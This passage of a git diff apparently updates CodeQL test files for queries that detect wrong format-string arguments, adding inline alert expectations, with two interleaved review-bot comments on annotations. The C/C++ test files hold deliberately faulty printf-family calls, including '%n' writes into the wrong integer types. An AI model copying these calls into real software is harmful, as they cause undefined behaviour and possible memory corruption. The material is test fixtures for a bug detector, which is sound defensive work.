GOOD - my_logger(0, "%i %i %i\n", 1, 2); // BAD (too few format arguments) + my_logger(0, "%i %i %i\n", 1, 2); // BAD (too few format arguments) // $ Alert[cpp/wrong-number-format-arguments] } // A spurious definition of my_logger diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.qlref 
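Review bot: In the positional width/precision blocks of `test`, the lines commented `GOOD [FALSE POSITIVE]` (`printf("%1$*2$d", num, width);` and `printf("%2$.*4$f", 0, num, 0, precision);`) are annotated with a plain `// $ Alert[cpp/too-many-format-arguments]`, which reads as an intended result. Marking them `// $ SPURIOUS: Alert[cpp/too-many-format-arguments]` keeps the test passing while recording that the alert is wrong. The line `printf("%2$.*4$f", num, 0, precision);` is described as too few arguments but expects the too-many query, so it probably wants `SPURIOUS:` for that id plus `MISSING: Alert[cpp/wrong-number-format-arguments]`; this should be confirmed against the query output. `test` runs on past the end of this hunk.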
@@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/second.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/second.cpp index 0345e8352bee..e1c086f235ad 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/second.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/second.cpp @@ -23,10 +23,10 @@ void test_size_t() { printf("%zi", &buffer[1023] - buffer); // GOOD printf("%zu", &buffer[1023] - buffer); // GOOD printf("%zx", &buffer[1023] - buffer); // GOOD - printf("%d", &buffer[1023] - buffer); // BAD + printf("%d", &buffer[1023] - buffer); // BAD // $ Alert printf("%ld", &buffer[1023] - buffer); // DUBIOUS [NOT DETECTED] printf("%lld", &buffer[1023] - buffer); // DUBIOUS [NOT DETECTED] - printf("%u", &buffer[1023] - buffer); // BAD + printf("%u", &buffer[1023] - buffer); // BAD // $ Alert // (for the `%ld` and `%lld` cases, the signedness and type sizes match, `%zd` would be most correct // and robust but the developer may know enough to make this safe) } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c index c5b3d1df493a..fa1d7a7ff327 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c @@ -4,7 +4,7 @@ int printf(const char * format, ...); int fprintf(); void f(UNKNOWN_CHAR * str) { - printf("%s", 1); // BAD + printf("%s", 1); // BAD // $ Alert printf("%s", implicit_function()); // GOOD - we should ignore the type sprintf(0, "%s", ""); // GOOD fprintf(0, "%s", ""); // GOOD 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/tests.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/tests.c index f94e01251eec..19e84bf15178 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/tests.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Builtin/tests.c @@ -1,5 +1,5 @@ void f() { char buf[35]; - __builtin___sprintf_chk(buf, 0, __builtin_object_size(buf, 1), "%s", 1); + __builtin___sprintf_chk(buf, 0, __builtin_object_size(buf, 1), "%s", 1); // $ Alert __builtin___sprintf_chk(buf, 0, __builtin_object_size(buf, 1), "%d", 1); } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/WrongTypeFormatArguments.qlref 
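Review bot: The annotated call `__builtin___sprintf_chk(buf, 0, __builtin_object_size(buf, 1), "%s", 1);` in `f` has no GOOD/BAD comment, unlike most other cases in these format tests. A reader has to work out that the expected alert is for the `int` passed where `%s` wants a string pointer. I would write its trailing comment as `// BAD: int argument for %s // $ Alert` and mark the `"%d", 1` call below it `// GOOD`. The same gap exists in Linux_signed_chars/format.h (the `"%d %f %s"` call to `error`) and Linux_signed_chars/linux.cpp (`obj.get_template_value()`), where the mismatched argument cannot be identified from the hunk alone.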
@@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/tests.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/tests.cpp index 5762ded379db..0024faa557eb 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/tests.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_byte_wprintf/tests.cpp 
@@ -15,34 +15,34 @@ void tests() { char16_t buffer[BUF_SIZE]; printf("%s", "Hello"); // GOOD - printf("%s", u"Hello"); // BAD: expecting char - printf("%s", L"Hello"); // BAD: expecting char + printf("%s", u"Hello"); // BAD: expecting char // $ Alert + printf("%s", L"Hello"); // BAD: expecting char // $ Alert - printf("%S", "Hello"); // BAD: expecting wchar_t or char16_t + printf("%S", "Hello"); // BAD: expecting wchar_t or char16_t // $ Alert printf("%S", u"Hello"); // GOOD printf("%S", L"Hello"); // GOOD wprintf(L"%s", "Hello"); // GOOD - wprintf(L"%s", u"Hello"); // BAD: expecting char + wprintf(L"%s", u"Hello"); // BAD: expecting char // $ Alert wprintf(L"%s", L"Hello"); // BAD: expecting char [NOT DETECTED; correct on Microsoft platforms] wprintf(L"%S", "Hello"); // BAD: expecting wchar_t [NOT DETECTED; correct on Microsoft platforms] - wprintf(L"%S", u"Hello"); // BAD: expecting wchar_t + wprintf(L"%S", u"Hello"); // BAD: expecting wchar_t // $ Alert wprintf(L"%S", L"Hello"); // GOOD swprintf(buffer, BUF_SIZE, u"%s", "Hello"); // GOOD swprintf(buffer, BUF_SIZE, u"%s", u"Hello"); // BAD: expecting char [NOT DETECTED; correct on Microsoft platforms] - swprintf(buffer, BUF_SIZE, u"%s", L"Hello"); // BAD: expecting char + swprintf(buffer, BUF_SIZE, u"%s", L"Hello"); // BAD: expecting char // $ Alert swprintf(buffer, BUF_SIZE, u"%S", "Hello"); // BAD: expecting char16_t [NOT DETECTED; correct on Microsoft platforms] swprintf(buffer, BUF_SIZE, u"%S", u"Hello"); // GOOD - swprintf(buffer, BUF_SIZE, u"%S", L"Hello"); // BAD: expecting char16_t + swprintf(buffer, BUF_SIZE, u"%S", L"Hello"); // BAD: expecting char16_t // $ Alert swprintf(buffer, BUF_SIZE, u"%hs", "Hello"); // GOOD - swprintf(buffer, BUF_SIZE, u"%hs", u"Hello"); // BAD: expecting char - swprintf(buffer, BUF_SIZE, u"%hs", L"Hello"); // BAD: expecting char + swprintf(buffer, BUF_SIZE, u"%hs", u"Hello"); // BAD: expecting char // $ Alert + swprintf(buffer, BUF_SIZE, u"%hs", L"Hello"); // BAD: expecting 
char // $ Alert - swprintf(buffer, BUF_SIZE, u"%ls", "Hello"); // BAD: expecting char16_t + swprintf(buffer, BUF_SIZE, u"%ls", "Hello"); // BAD: expecting char16_t // $ Alert swprintf(buffer, BUF_SIZE, u"%ls", u"Hello"); // GOOD - swprintf(buffer, BUF_SIZE, u"%ls", L"Hello"); // BAD: expecting char16_t + swprintf(buffer, BUF_SIZE, u"%ls", L"Hello"); // BAD: expecting char16_t // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_32.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_32.cpp index 3c9b802a7a74..7f2f3fb8d675 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_32.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_32.cpp @@ -11,7 +11,7 @@ void test_32() void *void_ptr; printf("%li", l); // GOOD - printf("%li", void_ptr); // BAD - printf("%p", l); // BAD + printf("%li", void_ptr); // BAD // $ Alert + printf("%p", l); // BAD // $ Alert printf("%p", void_ptr); // GOOD } 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_64.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_64.cpp index 6b38c4e0245c..05b3d950b199 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_64.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_mixed_word_size/tests_64.cpp @@ -11,7 +11,7 @@ void test_64() void *void_ptr; printf("%li", l); // GOOD - printf("%li", void_ptr); // BAD - printf("%p", l); // BAD + printf("%li", void_ptr); // BAD // $ Alert + printf("%p", l); // BAD // $ Alert printf("%p", void_ptr); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/format.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/format.h index 889dd2f58c8c..e5421e760a37 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/format.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/format.h 
@@ -13,5 +13,5 @@ static void error(int x1, int x2, int x3, int x4, int x5, void format2(char *str, int i, double d) { error(1, 2, 3, 4, 5, "%s %d %f", 1, 2, 3, 4, 5, 6, 7, str, i, d); - error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); + error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux.cpp index 9b26de4f54ef..971fa07446d0 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux.cpp @@ -12,7 +12,7 @@ struct S { template void template_func_calling_printf(S &obj) { ::printf("%d\n", obj.get_int()); - ::printf("%d\n", obj.get_template_value()); + ::printf("%d\n", obj.get_template_value()); // $ Alert } void instantiate() { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux_c.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux_c.c index bc6468c593b5..75af114da683 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux_c.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/linux_c.c @@ -8,5 +8,5 @@ void restrict_cases(char * restrict str1, const char * restrict str2, short * re { printf("%s", str1); // GOOD printf("%s", str2); // GOOD - printf("%s", str3); // BAD + printf("%s", str3); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/pri_macros.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/pri_macros.h index 782ee23faf30..2222b7e42518 100644 
--- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/pri_macros.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/pri_macros.h @@ -12,5 +12,5 @@ void test_PRI_macros() { printf("my_u64 = %" PRIu64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIx64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIi64 "\n", my_u64); // BAD: uint64_t read as int64_t [NOT DETECTED] - printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t + printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/printf1.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/printf1.h index 2cc67497c6e1..7157e8fbb6e2 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/printf1.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/printf1.h 
@@ -9,22 +9,22 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char const char cc = 'x'; printf("%s: %d\n", s, i); // ok - printf("%s: %f\n", s, i); // not ok (int -> float) + printf("%s: %f\n", s, i); // not ok (int -> float) // $ Alert printf("%s", us); // ok printf("%s", cs); // ok printf("%s", ss); // ok printf("%p", cs); // ok - printf("%p", i); // not ok (int -> void *) + printf("%p", i); // not ok (int -> void *) // $ Alert printf("%p", &f); // ok printf("%*s", i, cs); // ok printf("%*s", mi, cs); // ok printf("%*s", c, cs); // ok printf("%*s", cc, cs); // ok - printf("%*s", i, i); // not ok (int -> char *) + printf("%*s", i, i); // not ok (int -> char *) // $ Alert printf("%d %% %*s", i, i, cs); // ok - printf("%*s", cs, cs); // not ok (the width argument should be integer) + printf("%*s", cs, cs); // not ok (the width argument should be integer) // $ Alert printf("%c", 10); // ok printf("%c", 1000); // not ok [NOT DETECTED] @@ -35,15 +35,15 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char printf("%u", 1000); // ok printf("%i", MYONETHOUSAND); // ok - printf("%s", MYONETHOUSAND); // not ok (enum -> char *) + printf("%s", MYONETHOUSAND); // not ok (enum -> char *) // $ Alert printf("%c", MYONETHOUSAND); // not ok (enum -> char) [NOT DETECTED] printf("%i", mi); // ok printf("%u", mi); // not ok (int -> unsigned int) [NOT DETECTED] - printf("%d", ull); // not ok (unsigned long long -> int) - printf("%u", ull); // not ok (unsigned long long -> unsigned int) - printf("%x", ull); // not ok (unsigned long long -> unsigned int) + printf("%d", ull); // not ok (unsigned long long -> int) // $ Alert + printf("%u", ull); // not ok (unsigned long long -> unsigned int) // $ Alert + printf("%x", ull); // not ok (unsigned long long -> unsigned int) // $ Alert printf("%Lx", ull); // ok printf("%llx", ull); // ok } 
@@ -110,8 +110,8 @@ void extensions() printf("%Lg", ld); // GOOD printf("%llg", ld); // GOOD (nonstandard equivalent to %Lg) - printf("%Lg", d); // BAD (should be %g) - printf("%llg", d); // BAD (should be %g) + printf("%Lg", d); // BAD (should be %g) // $ Alert + printf("%llg", d); // BAD (should be %g) // $ Alert } { @@ -144,8 +144,8 @@ void fun4() long long ll; unsigned long long ull; - printf("%qi\n", i); // BAD - printf("%qu\n", ui); // BAD + printf("%qi\n", i); // BAD // $ Alert + printf("%qu\n", ui); // BAD // $ Alert printf("%qi\n", l); // GOOD printf("%qu\n", ul); // GOOD printf("%qi\n", ll); // GOOD 
@@ -157,82 +157,82 @@ void complexFormatSymbols(int i, const char *s) // positional arguments printf("%1$i", i, s); // GOOD printf("%2$s", i, s); // GOOD - printf("%1$s", i, s); // BAD - printf("%2$i", i, s); // BAD + printf("%1$s", i, s); // BAD // $ Alert + printf("%2$i", i, s); // BAD // $ Alert // width / precision printf("%4i", i); // GOOD printf("%.4i", i); // GOOD printf("%4.4i", i); // GOOD - printf("%4s", i); // BAD - printf("%.4s", i); // BAD - printf("%4.4s", i); // BAD + printf("%4s", i); // BAD // $ Alert + printf("%.4s", i); // BAD // $ Alert + printf("%4.4s", i); // BAD // $ Alert printf("%4s", s); // GOOD printf("%.4s", s); // GOOD printf("%4.4s", s); // GOOD - printf("%4i", s); // BAD - printf("%.4i", s); // BAD - printf("%4.4i", s); // BAD + printf("%4i", s); // BAD // $ Alert + printf("%.4i", s); // BAD // $ Alert + printf("%4.4i", s); // BAD // $ Alert // variable width / precision printf("%*s", i, s); // GOOD - printf("%*s", s, s); // BAD - printf("%*s", i, i); // BAD + printf("%*s", s, s); // BAD // $ Alert + printf("%*s", i, i); // BAD // $ Alert printf("%.*s", i, s); // GOOD - printf("%.*s", s, s); // BAD - printf("%.*s", i, i); // BAD + printf("%.*s", s, s); // BAD // $ Alert + printf("%.*s", i, i); // BAD // $ Alert printf("%*.4s", i, s); // GOOD - printf("%*.4s", s, s); // BAD - printf("%*.4s", i, i); // BAD + printf("%*.4s", s, s); // BAD // $ Alert + printf("%*.4s", i, i); // BAD // $ Alert printf("%4.*s", i, s); // GOOD - printf("%4.*s", s, s); // BAD - printf("%4.*s", i, i); // BAD + printf("%4.*s", s, s); // BAD // $ Alert + printf("%4.*s", i, i); // BAD // $ Alert printf("%*.*s", i, i, s); // GOOD - printf("%*.*s", s, i, s); // BAD - printf("%*.*s", i, s, s); // BAD - printf("%*.*s", i, i, i); // BAD + printf("%*.*s", s, i, s); // BAD // $ Alert + printf("%*.*s", i, s, s); // BAD // $ Alert + printf("%*.*s", i, i, i); // BAD // $ Alert // positional arguments mixed with variable width / precision printf("%2$*1$s", i, s); // GOOD - 
printf("%2$*2$s", i, s); // BAD - printf("%1$*1$s", i, s); // BAD + printf("%2$*2$s", i, s); // BAD // $ Alert + printf("%1$*1$s", i, s); // BAD // $ Alert printf("%2$*1$.4s", i, s); // GOOD - printf("%2$*2$.4s", i, s); // BAD - printf("%1$*1$.4s", i, s); // BAD + printf("%2$*2$.4s", i, s); // BAD // $ Alert + printf("%1$*1$.4s", i, s); // BAD // $ Alert printf("%2$.*1$s", i, s); // GOOD - printf("%2$.*2$s", i, s); // BAD - printf("%1$.*1$s", i, s); // BAD + printf("%2$.*2$s", i, s); // BAD // $ Alert + printf("%1$.*1$s", i, s); // BAD // $ Alert printf("%2$4.*1$s", i, s); // GOOD - printf("%2$4.*2$s", i, s); // BAD - printf("%1$4.*1$s", i, s); // BAD + printf("%2$4.*2$s", i, s); // BAD // $ Alert + printf("%1$4.*1$s", i, s); // BAD // $ Alert printf("%2$*1$.*1$s", i, s); // GOOD - printf("%2$*2$.*1$s", i, s); // BAD - printf("%2$*1$.*2$s", i, s); // BAD - printf("%1$*1$.*1$s", i, s); // BAD + printf("%2$*2$.*1$s", i, s); // BAD // $ Alert + printf("%2$*1$.*2$s", i, s); // BAD // $ Alert + printf("%1$*1$.*1$s", i, s); // BAD // $ Alert // left justify flag printf("%-4s", s); // GOOD printf("%1$-4s", s); // GOOD - printf("%-4i", s); // BAD - printf("%1$-4i", s); // BAD + printf("%-4i", s); // BAD // $ Alert + printf("%1$-4i", s); // BAD // $ Alert printf("%1$-4s", s, i); // GOOD - printf("%2$-4s", s, i); // BAD + printf("%2$-4s", s, i); // BAD // $ Alert printf("%1$-.4s", s, i); // GOOD - printf("%2$-.4s", s, i); // BAD + printf("%2$-.4s", s, i); // BAD // $ Alert printf("%1$-4.4s", s, i); // GOOD - printf("%2$-4.4s", s, i); // BAD + printf("%2$-4.4s", s, i); // BAD // $ Alert printf("%1$-*2$s", s, i); // GOOD - printf("%2$-*2$s", s, i); // BAD - printf("%1$-*1$s", s, i); // BAD + printf("%2$-*2$s", s, i); // BAD // $ Alert + printf("%1$-*1$s", s, i); // BAD // $ Alert } void myvsnprintf(const char *format_string, char *target, size_t buffer_size, va_list args) 
@@ -273,7 +273,7 @@ void usemyprintf(int i, char *s) char buffer[1024]; mysprintf("%i", buffer, 1024, i); // GOOD - mysprintf("%i", buffer, 1024, s); // BAD + mysprintf("%i", buffer, 1024, s); // BAD // $ Alert myprintf("%i", i); // GOOD - myprintf("%i", s); // BAD + myprintf("%i", s); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/real_world.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/real_world.h index eefb84993e74..6e592a95dc04 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/real_world.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/real_world.h @@ -58,9 +58,9 @@ void bar() printf("check %n", &i); // GOOD printf("check %n", &ui); // GOOD [dubious: int is written to unsigned int] printf("check %n", &si); // GOOD - printf("check %n", &s); // BAD: int is written to short - printf("check %hn", &i); // BAD: short is written to int - printf("check %hn", &ui); // BAD: short is written to unsigned int - printf("check %hn", &si); // BAD: short is written to signed int + printf("check %n", &s); // BAD: int is written to short // $ Alert + printf("check %hn", &i); // BAD: short is written to int // $ Alert + printf("check %hn", &ui); // BAD: short is written to unsigned int // $ Alert + printf("check %hn", &si); // BAD: short is written to signed int // $ Alert printf("check %hn", &s); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/wide_string.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/wide_string.h index 73bdee5b8b11..65042f843003 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/wide_string.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_signed_chars/wide_string.h 
@@ -22,7 +22,7 @@ void test_wchar4(char c, const char cc, wchar_t wc, const wchar_t wcc) { printf("%c", c); // GOOD printf("%c", cc); // GOOD printf("%c", 'c'); // GOOD - printf("%c", "c"); // BAD + printf("%c", "c"); // BAD // $ Alert printf("%wc", wc); // GOOD printf("%wc", wcc); // GOOD printf("%wc", L'c'); // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/printf.cpp b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/printf.cpp index 596e7ac73fc3..7eaeefab48e3 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/printf.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_two_byte_wprintf/printf.cpp 
@@ -40,12 +40,12 @@ void test2() { void test3() { char string[20]; - sprintf(string, "test %s", u"test"); // BAD: `char16_t` string parameter read as `char` string + sprintf(string, "test %s", u"test"); // BAD: `char16_t` string parameter read as `char` string // $ Alert } void test4() { char string[20]; - sprintf(string, "test %S", L"test"); // BAD: `wchar_t` string parameter read as `char16_t` string + sprintf(string, "test %S", L"test"); // BAD: `wchar_t` string parameter read as `char16_t` string // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/format.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/format.h index 889dd2f58c8c..e5421e760a37 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/format.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/format.h 
@@ -13,5 +13,5 @@ static void error(int x1, int x2, int x3, int x4, int x5, void format2(char *str, int i, double d) { error(1, 2, 3, 4, 5, "%s %d %f", 1, 2, 3, 4, 5, 6, 7, str, i, d); - error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); + error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/pri_macros.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/pri_macros.h index 782ee23faf30..2222b7e42518 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/pri_macros.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/pri_macros.h @@ -12,5 +12,5 @@ void test_PRI_macros() { printf("my_u64 = %" 